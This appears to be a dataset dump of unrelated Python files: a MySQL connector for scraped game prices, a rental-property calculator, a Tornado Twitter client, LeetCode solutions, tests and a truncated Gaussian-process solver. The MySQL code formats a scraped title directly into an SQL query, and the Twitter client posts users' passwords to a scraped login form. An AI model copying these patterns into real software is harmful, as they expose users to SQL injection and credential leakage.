without a specified pipeline) or generated by processing pipelines\n# add_data_specs = [\n# DatasetSpec(\n# 'sute_fix_dicoms',\n# dicom_format,\n# conversion_to_dicom_pipeline),\n# DatasetSpec(\n# 'sute_cont_dicoms',\n# dicom_format,\n# conversion_to_dicom_pipeline)]\n","sub_path":"nianalysis/study/mri/structural/ute.py","file_name":"ute.py","file_ext":"py","file_size_in_byte":22124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"18891867","text":"import mysql.connector\nfrom mysql.connector import errorcode\nfrom datetime import datetime\nimport logging\n\nconfig = {'user': 'root', 'password': '', 'host': '127.0.0.1', 'database': 'testdb', 'raise_on_warnings': True}\ncount = 0\n\nlogger = logging.getLogger(\"Humble_Database\")\n\n\nclass StripText:\n def __init__(self, chars=' \\r\\t\\n()£'):\n self.chars = chars\n\n def __call__(self, value): # This makes an instance callable!\n try:\n return value.strip(self.chars)\n except:\n return value\n\n\nclass HumbleDBConnector:\n\n logger.setLevel(logging.INFO)\n # create the logging file handler\n fh = logging.FileHandler(\"../logs/humble_database.log\")\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n # add handler to logger object\n logger.addHandler(fh)\n\n def connect_to_database(self, item):\n try:\n cnx = mysql.connector.connect(**config)\n cursor = cnx.cursor() # item['game_title] instead of item.game_title\n # self.insert_data(self, cursor, cnx, item['game_title'], item['game_price'])\n check_for_duplicates(cursor, cnx, item)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n logger.error(\"Something is wrong with your user name or password\")\n print(\"Something is wrong with your user name or password\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n logger.error(\"Database does not exist\")\n print(\"Database does not exist\")\n else:\n print(err)\n else:\n cnx.close()\n\n\ndef check_for_duplicates(cursor, cnx, item):\n check_duplicates = 'SELECT game_title FROM humble_first_test WHERE game_title = \"%s\"' % item['game_title']\n cursor.execute(check_duplicates)\n result = cursor.fetchone()\n if result:\n #logger.info({\"Duplicate item found: %s\" % result})\n print(\"Duplicate item found: %s\" % result)\n else:\n insert_data(cursor, cnx, item)\n\n\ndef validate(game, date_text):\n try:\n acceptable_date_format = datetime.strptime(date_text, '%d %b, %Y')\n return acceptable_date_format\n except ValueError:\n logger.warning({\"Incorrect data format! 
Date: \", date_text, \" Game: \", game})\n acceptable_date_format = '1000-01-01'\n return acceptable_date_format\n\n\n# the i=[0] trick is to keep count of how many times the function was called\ndef insert_data(cursor, cnx, item, i=[0]):\n\n add_row = \"INSERT INTO humble_first_test\" \"(a_i, game_title, game_platform, game_operating_system,\" \\\n \" discount_percentage, current_price, full_link, date_scrapped)\" \\\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\n\n a_i = cursor.lastrowid\n # sql = \"\"\"INSERT INTO test_table(A_I, Title, Price) VALUES(%s, %s, %s)\"\"\" % (A_I, 'Title', \"Price\")\n\n game_details = (a_i, item['game_title'], item['game_platform'], item['game_operating_system'],\n item['game_discount_percentage'], item['game_current_price'], item['game_full_link'],\n datetime.now())\n\n cursor.execute(add_row, game_details)\n #logger.info(\"Database update\")\n\n cnx.commit()\n cursor.close()\n i[0] += 1\n logger.info({\"Games added:\", i[0]})\n print(\"Games added:\", i[0])\n\n\nif __name__ == '__main__':\n print(\"This only executes when %s is executed rather than imported\" % __file__)\n\n","sub_path":"web_crawler/database_connector/humble_db_connector.py","file_name":"humble_db_connector.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"340217334","text":"\n\"\"\"\nrental property calculations\n\"\"\"\n\n\nimport numpy as np\nfrom utils import get_monthly_mortgage_payment, get_mortgage_balance\n\n# initial transaction\npurchase_price = 435e3\npurchase_closing_costs = 3000 + (0.00 * purchase_price)\ninitial_repairs = 12000\npre_rent_holding_days = 30\n\n# mortgage and taxes\ndown_payment_percentage = 25\nloan_interest_rate = 3.875\nloan_term_years = 30\nannual_taxes_percentage = 1.25\n\n# monthly rent and expenses\nmonthly_rent = 2200\nvacancy_days_per_year = 0\nmonthly_insurance = 125\nmonthly_repairs = 0\nmonthly_capex = 0\nmonthly_prop_mgmt_percentage = 0\n\n# appreciation and sale\nholding_years = 5\nappreciation_annual_percentage = 5\nagent_sale_percentage = 6\nsale_closing_costs = 5000\ncleanup_costs = 3000\n\nprint('\\nPurchase Price: ${:.0f}\\n'.format(purchase_price))\n\ndown_payment = (down_payment_percentage / 100) * purchase_price\nloan_amount = (1 - (down_payment_percentage / 100)) * purchase_price\n\nmonthly_mortgage_payment = get_monthly_mortgage_payment(loan_amount, loan_interest_rate, loan_term_years)\nmonthly_taxes = (annual_taxes_percentage / 100) * purchase_price / 12\npre_rent_holding_cost = (monthly_mortgage_payment + monthly_taxes + monthly_insurance + monthly_capex) * (pre_rent_holding_days / 30)\ntotal_invested_capital = down_payment + purchase_closing_costs + pre_rent_holding_cost + initial_repairs\n\nprint('Total Invested Capital: ${:.0f}'.format(total_invested_capital))\nprint(' {:.0f}% down payment: ${:.0f}'.format(down_payment_percentage, purchase_price - loan_amount))\nprint(' purchase closing costs: ${:.0f}'.format(purchase_closing_costs))\nprint(' pre-rent holding costs: ${:.0f}'.format(pre_rent_holding_cost))\nprint(' initial repairs: ${:.0f}\\n'.format(initial_repairs))\n\nprint('Monthly Income (rent): ${:.0f}\\n'.format(monthly_rent))\n\ndaily_rent = monthly_rent / 30\nmonthly_vacancy = daily_rent * vacancy_days_per_year / 12\nmonthly_prop_mgmt = (monthly_prop_mgmt_percentage / 100) * monthly_rent\nmonthly_expenses = \\\n monthly_mortgage_payment + \\\n monthly_taxes + \\\n monthly_insurance + \\\n monthly_vacancy + \\\n monthly_repairs 
+ \\\n monthly_capex + \\\n monthly_prop_mgmt\n\nprint('Monthly Expenses: ${:.0f}'.format(monthly_expenses))\nprint(' mortgage payment: ${:.0f}'.format(monthly_mortgage_payment))\nprint(' taxes: ${:.0f}'.format(monthly_taxes))\nprint(' insurance: ${:.0f}'.format(monthly_insurance))\nprint(' vacancy: ${:.0f}'.format(monthly_vacancy))\nprint(' repairs: ${:.0f}'.format(monthly_repairs))\nprint(' capex: ${:.0f}'.format(monthly_capex))\nprint(' property management: ${:.0f}\\n'.format(monthly_prop_mgmt))\n\nmonthly_cash_flow = monthly_rent - monthly_expenses\nannual_cash_flow_percentage = 100 * 12 * monthly_cash_flow / total_invested_capital\n\nprint('Monthly Cash Flow (Income - Expenses): ${:.0f}\\n'.format(monthly_cash_flow))\nprint('--- Annual Cash Flow Percentage: {:.1f}% ---\\n'.format(annual_cash_flow_percentage))\n\nsale_price = purchase_price * (1 + (appreciation_annual_percentage / 100)) ** holding_years\nagent_sale_fee = (agent_sale_percentage / 100) * sale_price\nmortgage_balance = get_mortgage_balance(loan_amount, loan_interest_rate, loan_term_years, holding_years)\nsale_profit = sale_price - (mortgage_balance + agent_sale_fee + sale_closing_costs + cleanup_costs)\n\nprint('Sale Profit: ${:.0f}'.format(sale_profit))\nprint(' sale price at {:.0f}% annual appreciation for {:.0f} years: ${:.0f}'.format(appreciation_annual_percentage, holding_years, sale_price))\nprint(' mortgage balance (from initial ${:.0f} balance): ${:.0f}'.format(loan_amount, mortgage_balance))\nprint(' agent fees at {:.0f}% commision: ${:.0f}'.format(agent_sale_percentage, agent_sale_fee))\nprint(' sale closing costs: ${:.0f}'.format(sale_closing_costs))\nprint(' cleanup costs: ${:.0f}\\n'.format(cleanup_costs))\n\nmonthly_cash_flow_profit = 12 * monthly_cash_flow * holding_years\ntotal_profit = monthly_cash_flow_profit + sale_profit\ntotal_annual_return = 100 * (((total_profit / total_invested_capital) ** (1 / holding_years)) - 1)\n\nprint('Total Profit: ${:.0f}'.format(total_profit))\nprint('(sale profit + ${:.0f} from monthly cash flow counted {} times\\n'.format(\n monthly_cash_flow_profit, holding_years * 12))\nprint('--- Annualized Total Return: {:.1f}% ---\\n'.format(total_annual_return))\n","sub_path":"bokeh/real estate/_old/v1/rental.py","file_name":"rental.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381822534","text":"\"\"\"Base class for chaining DBs\"\"\"\n\nimport itertools\n\nfrom collections import ChainMap\nfrom collections.abc import MutableMapping\n\n\nclass ChainDB(ChainMap):\n \"\"\" A ChainMap who's ``_getitem__`` returns either a ChainDB or\n the result\"\"\"\n\n def __getitem__(self, key):\n res = None\n results = []\n # Try to get all the data from all the mappings\n for mapping in self.maps:\n results.append(mapping.get(key, None))\n # if all the results are mapping create a ChainDB\n if all([isinstance(result, MutableMapping) for result in results]):\n for result in results:\n if res is None:\n res = ChainDB(result)\n else:\n res.maps.append(result)\n elif all([isinstance(result, list) for result in results]):\n return list(itertools.chain(*results))\n else:\n for result in reversed(results):\n if result is not None:\n return result\n return res\n\n def __setitem__(self, key, value):\n if key not in self:\n super().__setitem__(key, value)\n else:\n res = None\n results = []\n # Try to get all the data from all the mappings\n for mapping in reversed(self.maps):\n if key in mapping:\n 
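# overwrite the entry in every mapping that already defines this key\n                    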
mapping[key] = value\n","sub_path":"regolith/chained_db.py","file_name":"chained_db.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"583121999","text":"class Solution:\n def isToeplitzMatrix(self, matrix: List[List[int]]) -> bool:\n \n def check_diagonal_validity(arr, row, col):\n\n while row', response.body)[0]\r\n oauth_token = re.findall('', response.body)[0]\r\n \r\n # 将得到的用户名和密码POST到Twitter登陆界面\r\n \r\n args = {\r\n 'authenticity_token': authenticity_token,\r\n 'oauth_token': oauth_token,\r\n 'session[username_or_email]': self.get_argument('user'),\r\n 'session[password]': self.get_argument('passwd'),\r\n }\r\n http = tornado.httpclient.AsyncHTTPClient()\r\n http.fetch('https://api.twitter.com/oauth/authorize', \r\n method = 'POST',\r\n body = urllib.urlencode(args),\r\n callback = self._on_authorize_page)\r\n \r\n def _on_request_token(self, authorize_url, callback_uri, response):\r\n '''\r\n STEP2:\r\n 用得到的oauth_token去抓取Twitter的登陆界面\r\n '''\r\n\r\n if response.error:\r\n raise tornado.web.HTTPError(403, \"Could not get request token ~\")\r\n self._request_token = tornado.auth._oauth_parse_response(response.body)\r\n \r\n args = dict(oauth_token = self._request_token[\"key\"])\r\n auth_url = authorize_url + \"?\" + urllib.urlencode(args)\r\n http = tornado.httpclient.AsyncHTTPClient()\r\n http.fetch(auth_url, self._on_authenticate_page)\r\n \r\n def _on_authorize_page(self, response):\r\n ''' \r\n STEP4: \r\n 如果登陆成功则取得oauth_token和oauth_verifier然后利用auth模块得到access_token\r\n '''\r\n \r\n if response.error:\r\n raise tornado.web.HTTPError(404, \"Authorize Failed ~\")\r\n \r\n # 如果成功,可以在返回的页面里面扣到oauth_token和oauth_verifier\r\n \r\n try:\r\n token = re.findall('', response.body)\r\n request_key = token[0][0]\r\n oauth_verifier = token[0][1]\r\n except:\r\n raise tornado.web.HTTPError(401, \"Get Authorize Message Failed ~\")\r\n \r\n if self._request_token['key'] != request_key:\r\n raise tornado.web.HTTPError(403, \"Get Access Token Failed ~\")\r\n return\r\n \r\n token = dict(\r\n key = self._request_token['key'], \r\n secret = self._request_token['secret'],\r\n verifier = oauth_verifier\r\n )\r\n \r\n http = tornado.httpclient.AsyncHTTPClient()\r\n http.fetch(self._oauth_access_token_url(token), self._on_access_token)\r\n \r\n @tornado.web.asynchronous \r\n def post(self):\r\n ''' \r\n STEP1: \r\n 过程的入口,由tornado的auth模块帮我们得到oauth_token\r\n '''\r\n self.authenticate_redirect()\r\n\r\n @tornado.web.asynchronous \r\n def get(self):\r\n ''' \r\n STEP1: \r\n 过程的入口,由tornado的auth模块帮我们得到oauth_token\r\n '''\r\n self.authenticate_redirect()\r\n \r\nclass TwitterClient(tornado.auth.TwitterMixin, tornado.web.RequestHandler):\r\n '''\r\n A Twitter Client for Madoka frontend\r\n supported request:\r\n POST\r\n update\r\n GET\r\n tl\r\n mention\r\n show (得到某个特定id的Tweet\r\n usertl (User Timeline\r\n remove\r\n '''\r\n \r\n def _on_twitter_request(self, callback, response):\r\n \r\n # 这个也是TwitterMixin里面的东西,重写方法来拦截错误\r\n if response.error:\r\n raise tornado.web.HTTPError(403)\r\n return\r\n \r\n # 如果callback为None表示不需要回调函数,就直接调用self.finish就可以了ww\r\n if callback != None:\r\n callback(tornado.escape.json_decode(response.body))\r\n else:\r\n self.finish()\r\n \r\n\r\n def _dumpTweet(self, tweet):\r\n ''' 整理Tweet的内容将Twitter API返回的Tweet的格式转换成本地使用的格式 '''\r\n \r\n t = {}\r\n t['text'] = tweet['text']\r\n #\r\n # solve t.co problems -> replace t.co links with the original links\r\n #\r\n \r\n if 'entities' in 
tweet:\r\n            t['urls'] = tweet['entities']['urls']\r\n        else:\r\n            t['urls'] = []\r\n        \r\n        t['name'] = tweet['user']['name']\r\n        t['screen_name'] = tweet['user']['screen_name']\r\n        t['created_at'] = tweet['created_at'].replace('+0000', 'UTC')\r\n        t['id'] = tweet['id']\r\n        t['in_reply_to_status_id'] = tweet['in_reply_to_status_id']\r\n        t['profile_image_url'] = tweet['user']['profile_image_url']\r\n        return t\r\n    \r\n    \r\n    def _on_fetch(self, tweets, single_tweet = False):\r\n        \r\n        # errors are now intercepted in the overridden _on_twitter_request, so the code below is no longer needed\r\n        # if tweets == None:\r\n        #     raise tornado.httpclient.HTTPError(403)\r\n        \r\n        if single_tweet == False:\r\n            dump = [self._dumpTweet(tweet) for tweet in tweets]\r\n        else:\r\n            dump = self._dumpTweet(tweets)\r\n        self.write(tornado.escape.json_encode(dump))\r\n        self.finish()\r\n    \r\n    def _on_related_results(self, res):\r\n        \r\n        # handle the results returned by the /related_results/show/:id.json API\r\n        # if there are related results the list has exactly one element, otherwise it is empty\r\n        \r\n        in_reply_to = []\r\n        replies = []\r\n        \r\n        if len(res) > 0:\r\n            results = res[0]['results']\r\n            for item in results:\r\n                if item['annotations']['ConversationRole'] == 'Ancestor':\r\n                    in_reply_to.append(self._dumpTweet(item['value']))\r\n                else:\r\n                    replies.append(self._dumpTweet(item['value']))\r\n        \r\n        dump = dict(\r\n            in_reply_to = in_reply_to,\r\n            replies = replies,\r\n        )\r\n        \r\n        self.write(tornado.escape.json_encode(dump))\r\n        self.finish()\r\n    \r\n    def _dump_user_info(self, user_info):\r\n        ui = {}\r\n        ui['id'] = user_info['id']\r\n        ui['name'] = user_info['name']\r\n        ui['screen_name'] = user_info['screen_name']\r\n        ui['location'] = user_info['location']\r\n        ui['description'] = user_info['description']\r\n        ui['profile_image_url'] = user_info['profile_image_url']\r\n        ui['followers_count'] = user_info['followers_count']\r\n        ui['friends_count'] = user_info['friends_count']\r\n        ui['created_at'] = user_info['created_at'].replace('+0000', 'UTC')\r\n        ui['favourites_count'] = user_info['favourites_count']\r\n        ui['following'] = user_info['following']\r\n        ui['statuses_count'] = user_info['statuses_count']\r\n        return ui\r\n    \r\n    def _on_user_info(self, user_info):\r\n        self.write(tornado.escape.json_encode(self._dump_user_info(user_info)))\r\n        self.finish()\r\n    \r\n    @tornado.web.asynchronous\r\n    def get(self, request):\r\n        access_token = tornado.escape.json_decode(self.get_argument('access_token'))\r\n        secret = access_token['secret']\r\n        key = access_token['key']\r\n        \r\n        if request == 'home_timeline':\r\n            # get home timeline\r\n            \r\n            self.twitter_request(\r\n                path = \"/statuses/home_timeline\",\r\n                access_token = {u'secret': secret, u'key': key},\r\n                callback = self._on_fetch,\r\n                page = self.get_argument('page', 1),\r\n                include_entities = 'true'\r\n            ) \r\n        elif request == 'mentions':\r\n            # fetch the tweets that mention the user\r\n\r\n            self.twitter_request(\r\n                path = \"/statuses/mentions\",\r\n                page = self.get_argument('page', 1),\r\n                access_token = {u'secret': secret, u'key': key},\r\n                callback = self._on_fetch,\r\n                include_entities = 'true'\r\n            ) \r\n        elif request == 'show':\r\n            # fetch the tweet with the given id\r\n\r\n            self.twitter_request(\r\n                path = \"/statuses/show/\" + str(self.get_argument('id')),\r\n                access_token = {u'secret': secret, u'key': key},\r\n                callback = self.async_callback(self._on_fetch, single_tweet = True),\r\n                include_entities = False\r\n            ) \r\n        elif request == 'details':\r\n            \r\n            # fetch the results related to the tweet with the given id\r\n\r\n            self.twitter_request(\r\n                path = \"/related_results/show/\" + str(self.get_argument('id')),\r\n                access_token = {u'secret': secret, u'key': key},\r\n                callback = 
self._on_related_results,\r\n include_entities = True\r\n ) \r\n \r\n elif request == 'user_info':\r\n \r\n # 得到某个用户的信息\r\n \r\n self.twitter_request(\r\n path = \"/users/show\",\r\n access_token = {u'secret': secret, u'key': key},\r\n callback = self._on_user_info,\r\n screen_name = self.get_argument('screen_name')\r\n ) \r\n \r\n elif request == 'remove':\r\n # 删除某个Tweet\r\n def on_fetch(tweet):\r\n pass\r\n \r\n self.twitter_request(\r\n path = \"/statuses/destroy/\" + str(self.get_argument('id')),\r\n access_token = {u'secret': secret, u'key': key},\r\n post_args = {},\r\n callback = None,\r\n ) \r\n elif request == 'user_timeline':\r\n # 得到某用户的Timeline\r\n \r\n self.twitter_request(\r\n path = \"/statuses/user_timeline\",\r\n access_token = {u'secret': secret, u'key': key},\r\n page = self.get_argument('page', 1),\r\n screen_name = self.get_argument('screen_name'),\r\n callback = self._on_fetch,\r\n include_entities = 'true'\r\n ) \r\n elif request == 'follow':\r\n #\r\n # follow someone \r\n # argument screen_name: screen name of the one you want to follow\r\n #\r\n self.twitter_request(\r\n path = \"/friendships/create\",\r\n access_token = {u'secret': secret, u'key': key},\r\n post_args={'screen_name': self.get_argument('screen_name')},\r\n callback = None,\r\n ) \r\n elif request == 'unfollow':\r\n #\r\n # follow someone \r\n # argument screen_name: screen name of the one you want to follow\r\n #\r\n self.twitter_request(\r\n path = \"/friendships/destroy\",\r\n access_token = {u'secret': secret, u'key': key},\r\n post_args={'screen_name': self.get_argument('screen_name')},\r\n callback = None,\r\n ) \r\n else:\r\n raise tornado.httpclient.HTTPError(403, 'Invaild Request Path ~') \r\n \r\n @tornado.web.asynchronous\r\n def post(self, request):\r\n access_token = tornado.escape.json_decode(self.get_argument('access_token'))\r\n secret = access_token['secret']\r\n key = access_token['key']\r\n if request == 'update':\r\n # tweet\r\n \r\n status = tornado.escape.url_unescape(self.get_argument('status').encode('utf-8'))\r\n def on_fetch(tweets):\r\n if tweets == None:\r\n raise tornado.httpclient.HTTPError(403)\r\n self.write('Done ~')\r\n self.finish()\r\n \r\n # 将多于140个字符的部分截去\r\n \r\n if len(status) > 140:\r\n text = status[:136] + '...'\r\n else:\r\n text = status\r\n\r\n # 如果有in_reply_to参数则带上这个参数ww\r\n \r\n in_reply_to_param = {}\r\n if self.get_argument('in_reply_to', None):\r\n in_reply_to_param['in_reply_to_status_id'] = self.get_argument('in_reply_to', None)\r\n \r\n self.twitter_request(\r\n path = \"/statuses/update\",\r\n post_args={\"status\": text},\r\n access_token = {u'secret': secret, u'key': key},\r\n callback = on_fetch,\r\n **in_reply_to_param\r\n ) \r\n \r\n \r\n","sub_path":"TwitterClient.py","file_name":"TwitterClient.py","file_ext":"py","file_size_in_byte":13662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"323466883","text":"from datetime import datetime\nfrom django.conf import settings\nfrom django.template import TemplateSyntaxError\nfrom django.test import TestCase\nfrom django.test.utils import override_settings\nfrom pinpayments.templatetags.pin_payment_tags import pin_form, pin_header\n\nENV_OK = {\n 'staging': {\n 'key': 'key1',\n 'secret': 'secret1',\n 'host': 'test-api.pin.net.au',\n },\n}\n\nENV_MISSING_KEY = {\n 'test': {\n 'secret': 'secret1',\n 'host': 'test-api.pin.net.au',\n },\n}\n\nENV_MISSING_HOST = {\n 'test': {\n 'key': 'key1',\n 'secret': 'secret1',\n },\n}\n\nclass 
TemplateTagsTests(TestCase):\n def test_pin_form(self):\n form = pin_form()\n current_year = datetime.now().year\n self.assertEqual(form['pin_cc_years'],\n range(current_year, current_year + 15))\n\n def test_pin_header_default_environment(self):\n header = pin_header()\n self.assertEqual(header['pin_environment'], 'test')\n\n @override_settings(PIN_ENVIRONMENTS={})\n def test_pin_header_no_environments(self):\n self.assertRaises(TemplateSyntaxError, pin_header)\n\n def test_pin_header_invalid_environment(self):\n with self.assertRaises(TemplateSyntaxError):\n pin_header(environment='should not exist')\n\n @override_settings(PIN_ENVIRONMENTS=ENV_MISSING_KEY)\n def test_pin_header_no_key(self):\n self.assertRaises(TemplateSyntaxError, pin_header)\n\n @override_settings(PIN_ENVIRONMENTS=ENV_MISSING_HOST)\n def test_pin_header_no_host(self):\n self.assertRaises(TemplateSyntaxError, pin_header)\n\n @override_settings(PIN_ENVIRONMENTS=ENV_OK)\n def test_pin_header_success(self):\n header = pin_header(environment='staging')\n self.assertEqual(header['pin_environment'], 'staging')\n self.assertEqual(header['pin_public_key'], 'key1')\n self.assertEqual(header['pin_host'], 'test-api.pin.net.au')\n","sub_path":"pinpayments/tests/templatetags.py","file_name":"templatetags.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"59688360","text":"\"\"\"\nTime O(M+N)\nSpace O(1)\n\"\"\"\n\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type headA, headB: ListNode\n :rtype: ListNode\n \"\"\"\n if headA == None or headB == None:\n return None\n\n #assign two pointers\n curA = headA \n curB = headB\n\n #change curA to headB when it reaches the end of the list A, same for curB\n #they either meet or both be None\n while curA != curB:\n if curA == None:\n curA = headB\n else:\n curA = curA.next\n \n if curB == None:\n curB = headA\n else:\n curB = curB.next\n\n return curA \n\n\n\"\"\"\nHash table solution \nTime O(n)\nSpace O(n)\n\"\"\"\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type headA, headB: ListNode\n :rtype: ListNode\n \"\"\"\n if headA == None or headB == None:\n return None\n\n dic = {}\n \n while headA != None:\n dic[headA] = headA\n headA = headA.next\n \n while headB != None:\n if headB in dic:\n return headB\n else:\n headB = headB.next\n \n return headB","sub_path":"160.Intersecion_of_two_linkedlists.py","file_name":"160.Intersecion_of_two_linkedlists.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
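An aside on the intersection record above: the two-pointer variant works because each pointer traverses len(A) + len(B) nodes in total, so the pointers come into phase at the first shared node, or meet at None when the lists are disjoint. A minimal usage sketch, assuming the ListNode and Solution definitions from that snippet (the node values are made up); either Solution variant behaves the same here:

# shared tail: 8 -> 4 -> 5
tail = ListNode(8)
tail.next = ListNode(4)
tail.next.next = ListNode(5)

headA = ListNode(4)            # list A: 4 -> 1 -> 8 -> 4 -> 5
headA.next = ListNode(1)
headA.next.next = tail

headB = ListNode(5)            # list B: 5 -> 0 -> 1 -> 8 -> 4 -> 5
headB.next = ListNode(0)
headB.next.next = ListNode(1)
headB.next.next.next = tail

node = Solution().getIntersectionNode(headA, headB)
assert node is tail            # intersection is by node reference, not by value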
+{"seq_id":"216912958","text":"import os\nimport numpy as np\nimport pytest\nfrom jina.executors.metas import get_default_metas\nfrom jina.executors import BaseExecutor\nfrom .. import ImagePaddlehubEncoder\n\ninput_dim = 224\ntarget_output_dim = 2048\nnum_doc = 2\ntest_data = np.random.rand(num_doc, 3, input_dim, input_dim)\ntmp_files = []\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef metas(tmpdir):\n metas = get_default_metas()\n if 'JINA_TEST_GPU' in os.environ:\n metas['on_gpu'] = True\n metas['workspace'] = str(tmpdir)\n yield metas\n\n\ndef test_imagepaddlehubencoder_encode(metas):\n encoder = ImagePaddlehubEncoder(metas=metas)\n encoded_data = encoder.encode(test_data)\n assert encoded_data.shape == (num_doc, target_output_dim)\n\n\ndef test_imagepaddlehubencoder_save_and_load(metas):\n encoder = ImagePaddlehubEncoder(metas=metas)\n encoder.touch()\n encoder.save()\n assert os.path.exists(encoder.save_abspath)\n encoder_loaded = BaseExecutor.load(encoder.save_abspath)\n assert encoder_loaded.model_name == encoder.model_name\n\n\ndef test_imagepaddlehubencoder_save_and_load_config(metas):\n encoder = ImagePaddlehubEncoder(metas=metas)\n encoder.save_config()\n assert os.path.exists(encoder.config_abspath)\n encoder_loaded = BaseExecutor.load_config(encoder.config_abspath)\n assert encoder_loaded.model_name == encoder.model_name\n","sub_path":"encoders/image/ImagePaddlehubEncoder/tests/test_paddlehub.py","file_name":"test_paddlehub.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"301262389","text":"\"\"\"\n\nAlgorithm:\n\n1. Map each character in str1 to what it needs to be in str2.\n2. If any of these mappings collide then return False since the transformation\n is impossible.\n (e.g. str1 = \"aa\", str2 = \"bc\", \"a\" needs to become both \"b\" and \"c\")\n3. Next, we check the number of unique characters in str2.\n If all 26 characters are represented, there are no characters available\n to use for temporary conversions, and the transformation is impossible.\n The only exception to this is if str1 is equal to str2 and we handle this\n case at the start of the function.\n\n\nTime Complexity: O(n)\nSpace Complexity: O(1)\n\n\"\"\"\n\n\nclass Solution:\n def canConvert(self, str1: str, str2: str) -> bool:\n # base case\n if str1 == str2:\n return True\n m = {}\n for i in range(len(str1)):\n # update mapping\n if str1[i] not in m:\n m[str1[i]] = str2[i]\n # collision detected, return False\n elif m[str1[i]] != str2[i]:\n return False\n return len(set(str2)) < 26\n","sub_path":"stringTransformsIntoAnotherString.py","file_name":"stringTransformsIntoAnotherString.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"96029020","text":"\nclass Details:\n width = 720\n height = 540\n name = \"Traffic Violation Detection System\"\n version = \"1\"\n\n\nclass State:\n footage = \"\"\n logging = None\n main = None\n dashboard = None\n model_path = \"\"\n pbtext_path = \"\"\n source = \"\"\n isStarted = False\n config_path = \"config/application.config\"\n config = None\n config_dict = {\n 'CAMERA_1': '/',\n 'CAMERA_2': '/'\n }\n\n","sub_path":"application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"470631391","text":"# coding: utf-8\n \nimport GPy \nimport GPy.util as gutil\nimport numpy as np\nimport scipy as sp\nimport warnings\n \nclass G2PnetSolver:\n \"\"\"\n \n Grassmannian Gaussian Process Network (G2P-net) solver\n 
\n :param X: input observations, with rows as samples\n :param kernel: GPy.kern.Kern type module \n :param U: latent variables of the observation \n : \n \n \"\"\"\n \n def __init__(self, X, U, kernel, eta=0.01, tol=1e-3, max_iters=10, max_iters_kernel=100, add_regularizer=False, normalize_X = False ):\n if len(X.shape) == 1:\n X = X.reshape(-1,1)\n warnings.warn(\"One dimensional observation (N,) being shaped as (N,1)\")\n if len(U.shape) == 1:\n U = U.reshape(-1,1)\n warnings.warn(\"One dimensional input (N,) being shaped as (N,1)\")\n \n self.U = U\n self._init_U = U\n nsample, self.ndim_latent = U.shape \n \n self.X = X\n self.nsample, self.ndim = X.shape\n assert self.nsample == nsample, \"The number of samples does not match.\" \n \n if normalize_X:\n self._Xoffset = np.mean(X,axis=1)\n self._Xscale = np.std(X, axis=1)\n self.X = (X.copy() - self._Xoffset) / self._Xscale\n \n self._init_X = X\n self.XX = gutil.linalg.tdot(self.X)\n\n assert isinstance(kernel, GPy.kern.Kern), \"Use the GPy.kern.Kern type module\" \n assert kernel.input_dim == self.ndim_latent , \"The input dimension of U and kernel should match\" \n self.kern = kernel\n self._kern = self.kern\n \n self.max_iters_kernel = int(max_iters_kernel)\n print(\"Kernel initialization ...\")\n self.kern, _, self.KiX2 = self.kernel_update(X=self.X, U=self.U, kernel=self.kern)\n self.negative_loglikelihood_update()\n \n\n self.add_regularizer = add_regularizer\n\n self.eta = float(eta)\n self.max_iters = int(max_iters)\n self._max_iters = self.max_iters\n self.tol = float(tol)\n \n self.hist_kern = list()\n self.hist_nll = np.zeros([max_iters])\n self.hist_eta = np.zeros([max_iters])\n \n \n \n\n def optimize(self, max_iters = 10, tol=1e-3, init_mode = \"fixed\", optimizor=\"grad_descent\", verbose=False):\n '''\n \n The main function of optimization procedure. 
Calls optimize_gradient_descent if the gradient descent is required \n\n\n '''\n\n\n if optimizor == \"grad_descent_grass\":\n return self.optimize_gradient_descent_grass(max_iters, tol, verbose)\n elif optimizor == \"grad_descent\":\n return self.optimize_gradient_descent_Euclidean(max_iters, tol, verbose) \n\n\n\n \n def optimize_gradient_descent_grass(self, max_iters=10, tol=1e-3, init_mode = \"fixed\", verbose=False):\n '''\n\n Optimization procedure using gradient descent on manifold.\n\n\n '''\n self.max_iters = max_iters\n self.tol = tol\n self.hist_kern = list()\n self.hist_nll = np.zeros([max_iters])\n self.hist_eta = np.zeros([max_iters])\n\n messages = verbose\n \n eta = self.eta*np.ones([max_iters])\n self.hist_eta = eta\n for i, eta_i in enumerate(eta):\n self.hist_kern.append(self.kern)\n self.hist_nll[i] = self.negative_loglikelihood\n print(\"[step {0:3d}] neg-log-likelihood {1:9f} stepsize {2:5.3f}\".format(i, self.negative_loglikelihood, eta_i))\n # compute the grassmannian gradient\n 